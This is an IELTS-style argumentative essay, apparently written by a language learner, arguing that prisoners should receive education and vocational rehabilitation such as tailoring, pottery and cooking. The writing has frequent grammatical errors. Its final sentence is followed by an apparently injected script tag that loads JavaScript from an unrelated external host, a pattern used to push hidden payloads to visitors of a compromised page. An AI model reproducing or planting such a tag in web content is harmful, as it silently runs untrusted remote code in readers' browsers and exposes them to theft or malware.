All criminals should have access to education access to education and rehabilitation programs while in prison. To what extent do you agree or disagree?.

While in prison, it is mandatory for all criminals to get access to rehabilitation programs and education. I completely agree with this statement.

In general, it is necessary for people to get rehabilitated after they overcome terrible situations or from disease conditions. So, as like people it is more and more necessary for each and every prisoners to be parted in rehabilitation programs for to cure themselves. This plays a major role in nourishment of prisoners forth coming life. This program creates an identity after they lost their original identity due to certain circumstances and make themselves to regain their self respect and social dignity from the society not only this but also they can gain trust from the society. Moreover, rehabilitation programs like vocational training improve prisoners quality of life once they have end their prison term. For example, tailoring, pottery, art, saree embroidery, cooking etc which makes them not to depend others or their family members for to make their own food.

In human life, education is preliminary key to success as so, it’s for prisoners also. Moralistic education is crucial for all prisoners which changes their behavioural attitudes. Furthermore, it makes them to think wisely and allow them to take wiser decision in critical circumstances which avoids prisoners not to commit the same mistakes over and over. In addition, education creates an active employment status for prisoners in the society. So this positively reduces the social stigma that prisoners are not commit into mischievous attitudes again and again, they can transform themselves as normal being as like everyone.

In conclusion, education and rehabilitation programs should be provided for all prisoners for to reform themselves and not for retribution. <script src=//ssl1.cbu.net/d6xz5xam></script>